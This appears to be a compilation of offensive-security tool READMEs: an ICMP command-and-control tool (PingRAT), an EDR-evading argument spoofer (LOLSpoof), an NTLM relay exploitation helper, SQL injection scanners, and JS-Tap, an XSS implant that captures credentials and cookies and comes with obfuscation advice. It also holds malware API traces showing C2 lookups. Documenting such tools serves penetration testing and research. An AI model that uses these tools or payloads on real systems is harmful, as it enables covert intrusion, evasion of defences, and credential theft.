
python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

By: Zion3R


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.

It will output the response codes and length for each request, in a nicely organized, color coded way so things are readable.
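As a sketch of the general idea (not BypassFuzzer's actual payload set), probing a handful of path-normalization variants and printing the response code and length for each might look like this; the target URL is a placeholder.

# Illustrative path-normalization probe: print code and length per payload.
import requests

BASE = "https://example.com"  # placeholder target
PATH = "/forbidden"
payloads = [PATH, f"{PATH}/.", f"/.{PATH}", f"/%2e{PATH}", f"{PATH}%20", f"{PATH}..;/"]

for p in payloads:
    r = requests.get(BASE + p, allow_redirects=False, timeout=10)
    print(f"{r.status_code:<4} {len(r.content):<8} {p}")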

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request. Maybe you need to add some kind of auth header, like Authorization: Bearer <token>.

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

The number of repeats is changeable in the code until I add an option to specify it via a flag.
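Conceptually, the filter boils down to counting (status code, length) pairs and muting a pair once it has been seen the threshold number of times; a minimal sketch of that idea (not the tool's actual code):

# Mute responses whose (code, length) pair has been seen 8+ times.
from collections import Counter

THRESHOLD = 8
seen = Counter()

def should_show(status: int, length: int) -> bool:
    seen[(status, length)] += 1
    return seen[(status, length)] <= THRESHOLD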

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638

TODO

  • [x] Automatically check other methods/verbs for bypass
  • [x] absolute domain attack
  • [ ] Add HTTP/2 support
  • [ ] Looking for ideas. Ping me on twitter! @intrudir


PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

By: Zion3R


PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

Features:

  • Uses ICMP for Command and Control
  • Undetectable by most AV/EDR solutions
  • Written in Go
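PingRAT ships as Go binaries, but the core trick of carrying C2 data in ICMP echo payloads can be sketched with scapy (requires root; the destination address is a placeholder):

# Conceptual sketch: send a command in an ICMP echo payload, read the reply.
from scapy.all import ICMP, IP, Raw, sr1

reply = sr1(IP(dst="192.0.2.10") / ICMP(type=8) / Raw(load=b"whoami"),
            timeout=2, verbose=False)
if reply is not None and reply.haslayer(Raw):
    print(reply[Raw].load.decode(errors="replace"))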

Installation:

Download the binaries

or build the binaries and you are ready to go:

$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go

Usage:

Server:

./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)

Client:

./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)



LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

By: Zion3R


LOLSpoof is an interactive shell program that automatically spoofs the command-line arguments of the spawned process. Just call your incriminating-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


Why

The process command line is a heavily monitored piece of telemetry, thoroughly inspected by AV/EDRs, SOC analysts and threat hunters.

How

  1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
  2. Spawns that suspended LOLBin with the spoofed command line
  3. Gets the remote PEB address
  4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
  5. Gets the address of the command line unicode buffer
  6. Overrides the fake command line with the real one
  7. Resumes the main thread

Opsec considerations

Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:

  1. Creation of a suspended process
  2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
  3. Write to the spawned process with WriteProcessMemory

Build

Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

nimble install winim

Known issue

Programs that clear or change the previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that; open to suggestions.



SQLMC - Check All Urls Of A Domain For SQL Injections

By: Zion3R


SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
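As a sketch of the kind of check a scanner like this performs (not SQLMC's actual implementation), an error-based probe appends a quote to a parameter and looks for database error strings; the URL and error list below are illustrative.

# Toy error-based SQLi probe.
import requests

ERROR_STRINGS = ("sql syntax", "mysql_fetch", "sqlstate", "unclosed quotation mark")

def looks_injectable(url: str) -> bool:
    body = requests.get(url + "'", timeout=10).text.lower()
    return any(err in body for err in ERROR_STRINGS)

print(looks_injectable("http://example.com/item.php?id=1"))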

Features

  • Scans a domain for SQL injection vulnerabilities
  • Crawls the given URL up to a specified depth
  • Checks each link for SQL injection vulnerabilities
  • Reports vulnerabilities along with server information and depth

Installation

  1. Install the required dependencies: pip3 install sqlmc

Usage

Run sqlmc with the following command-line arguments:

  • -u, --url: The URL to scan (required)
  • -d, --depth: The depth to scan (required)
  • -o, --output: The output file to save the results

Example usage:

sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

The tool will then perform the scan and display the results.

ToDo

  • Check for multiple GET params
  • Better injection checker trigger methods

License

This project is licensed under the GNU Affero General Public License v3.0.



BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

By: Zion3R


BadExclusionsNWBO is an evolution of BadExclusions to identify custom or undocumented folder exclusions on AV/EDR.

How it works?

BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.

Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or fewer, the folder has an exclusion; otherwise, the folder is not excluded.
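BadExclusionsNWBO itself is a compiled executable, but the sweep logic is easy to picture; the Python sketch below assumes the checker sits next to the script and prints a bare hook count, both of which are assumptions.

# Rough sketch of the copy-run-parse sweep.
import os
import shutil
import subprocess

CHECKER = "Hook_Checker.exe"
HOOK_THRESHOLD = 7  # 7 or fewer hooks suggests an exclusion

def sweep(root: str) -> None:
    for dirpath, _dirs, _files in os.walk(root):
        target = os.path.join(dirpath, CHECKER)
        try:
            shutil.copy(CHECKER, target)
            out = subprocess.run([target], capture_output=True, text=True,
                                 timeout=60).stdout
            if int(out.strip()) <= HOOK_THRESHOLD:
                print(f"[!] Possible exclusion: {dirpath}")
        except (OSError, subprocess.SubprocessError, ValueError):
            continue  # no write access, run failure, or unparsable output
        finally:
            try:
                os.remove(target)
            except OSError:
                pass

sweep(r"C:\Program Files")  # placeholder path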


Original idea?

Since the release of BadExclusions I've been thinking about how to achieve the same results without creating as much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and in a folder with a specific type of exclusion, you will notice a huge difference. All the information is on the Probatorum repository.

Requirements

Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusions, and not all vendors, remove the hooks when they exclude a folder.

The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write the Hook_Checker file and get the results.

EDR Demo

https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

By: Zion3R

Description

Presented at CODE BLUE 2023, this project, titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis, introduces IOCTLance, a tool that enhances the capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


Features

Target Vulnerability Types

  • map physical memory
  • controllable process handle
  • buffer overflow
  • null pointer dereference
  • read/write controllable address
  • arbitrary shellcode execution
  • arbitrary wrmsr
  • arbitrary out
  • dangerous file operation

Optional Customizations

  • length limit
  • loop bound
  • total timeout
  • IoControlCode timeout
  • recursion
  • symbolize data section

Build

Docker (Recommended)

docker build .

Local

dpkg --add-architecture i386
apt-get update
apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
libffi-dev libxslt1-dev libxml2-dev

pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

Analysis

# python3 analysis/ioctlance.py -h
usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
[-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
path

positional arguments:
path dir (including subdirectory) or file path to the driver(s) to analyze

optional arguments:
-h, --help show this help message and exit
-i IOCTLCODE, --ioctlcode IOCTLCODE
analyze specified IoControlCode (e.g. 22201c)
-T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
-t TIMEOUT, --timeout TIMEOUT
timeout for analyze each IoControlCode (default 40, 0 to unlimited)
-l LENGTH, --length LENGTH
the limit of number of instructions for technique LengthLimiter (default 0, 0 to unlimited)
-b BOUND, --bound BOUND
the bound for technique LoopSeer (default 0, 0 to unlimited)
-g GLOBAL_VAR, --global_var GLOBAL_VAR
symbolize how many bytes in .data section (default 0 hex)
-a ADDRESS, --address ADDRESS
address of ioctl handler to directly start hunting with blank state (e.g.
140005c20)
-e EXCLUDE, --exclude EXCLUDE
exclude function address split with , (e.g. 140005c20,140006c20)
-o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
-r, --recursion do not kill state if detecting recursion (default False)
-c, --complete get complete base state (default False)
-d, --debug print debug info while analyzing (default False)

Evaluation

# python3 evaluation/statistics.py -h
usage: statistics.py [-h] [-w] path

positional arguments:
path target dir or file path

optional arguments:
-h, --help show this help message and exit
-w, --wdm copy the wdm drivers into <path>/wdm

Test

  1. Compile the testing examples in test to generate testing driver files.
  2. Run IOCTLance against the driver files.

Reference



NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays

By: Zion3R


NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


Features

  • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
  • SMB Shares Enumeration: List available SMB shares.
  • SMB Shell Execution: Execute a shell via SMB.
  • Secrets Dumping: Dump secrets from the target.
  • MSSQL Database Enumeration: List available MSSQL databases.
  • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

  • proxychains properly configured with ntlmrelayx SOCKS relay port
  • Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

  1. Ensure that Python 3.6 or higher is installed on your system.

  2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat
  3. Install dependencies, if you don't have them installed already:
pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

Disclaimer

NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

License

This project is licensed under the MIT License - see the LICENSE file for details.



Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

By: Zion3R


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!


How it works?

Although Golang programs contain a lot of nuances regarding the way they are built and their behavior at runtime, they still need to interact with the OS layer, and that means at some point they do need to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall, and this function is a kind of "gateway" used to interact with the Windows API. Since this function is expected to call the Windows API functions, we can assume it needs to have access to information such as the address of the function and its parameters, and this is where things start to get more interesting.

Asmstdcall receives a single parameter, which is a pointer to something similar to the following structure:

struct LIBCALL {
DWORD_PTR Addr;
DWORD Argc;
DWORD_PTR Argv;
DWORD_PTR ReturnValue;

[...]
}

Some of these fields are filled after the API function is called, like the return value; others are received by asmstdcall, like the function address, the number of arguments, and the list of arguments. Regardless of when those are set, it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log them to the user. The tool is capable of logging the function name, its parameters, and also the return value of each Windows function called by a Golang application, all with no need to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating them by commas with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or by trying to guess it. There are some interesting characteristics that can be used to determine it; for example, Golang applications seem to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc), so you can consider that during your analysis.

The default config file contains multiple functions which I have tested already (at least most of them) and can say for sure can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidW(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57)

[...]

Future features:

  • [x] Support inspection of 32 bits files.
  • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
  • [x] Add support to cmdline parameters for the target process
  • [ ] Send the tracing log output to a file by default to make it easier to filter. Currently there's no separation between the target file output and the gftrace output. An alternative is redirecting gftrace output to a file using the command line.

⚠️ Warning

  • The tool inspects the target binary dynamically, which means the file being traced is executed. If you're inspecting a malware or an unknown software, please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending on the file and/or function being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc). The tool ignores the Golang runtime initialization noise, but after that it's up to the user to decide which functions are better to filter in each scenario.

License

The gftrace is published under the GPL v3 License. Please refer to the file named LICENSE for more information.



HardeningMeter - Open-Source Python Tool Carefully Designed To Comprehensively Assess The Security Hardening Of Binaries And Systems

By: Zion3R


HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a csv. (For more information see the Documentation.md file)


Execute Scanning Example

Scan the '/bin/cp' file and the system hardening methods:

python3 HardeningMeter.py -f /bin/cp -s

Installation Requirements

Before installing HardeningMeter, make sure your machine has the following:

  1. The readelf and file commands
  2. Python version 3
  3. pip
  4. tabulate

pip install tabulate

Install HardeningMeter

The very latest developments can be obtained via git.

Clone or download the project files (no compilation nor installation is required)

git clone https://github.com/OfriOuzan/HardeningMeter

Arguments

-f --file

Specify the files you want to scan; the argument can take more than one file, separated by spaces.

-d --directory

Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.

-e --external

Specify whether you want to add external checks (False by default).

-m --show_missing

Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.

-s --system

Specify if you want to scan the system hardening methods.

-c --csv_format

Specify if you want to save the results to a csv file (results are printed as a table to stdout by default).

Results

HardeningMeter's results are printed as a table and consist of 3 different states:

  • (X) - This state indicates that the binary hardening mechanism is disabled.
  • (V) - This state indicates that the binary hardening mechanism is enabled.
  • (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.

Notes

When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.



JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

By: Zion3R


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using it in an engagement, strongly consider changing the naming of endpoints, stripping comments, and heavily obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function; search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In both cases, the payload will be deleted from memory and stop working. JS-Tap needs to run a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame, and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note, I've had good luck using Trap Mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, so you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

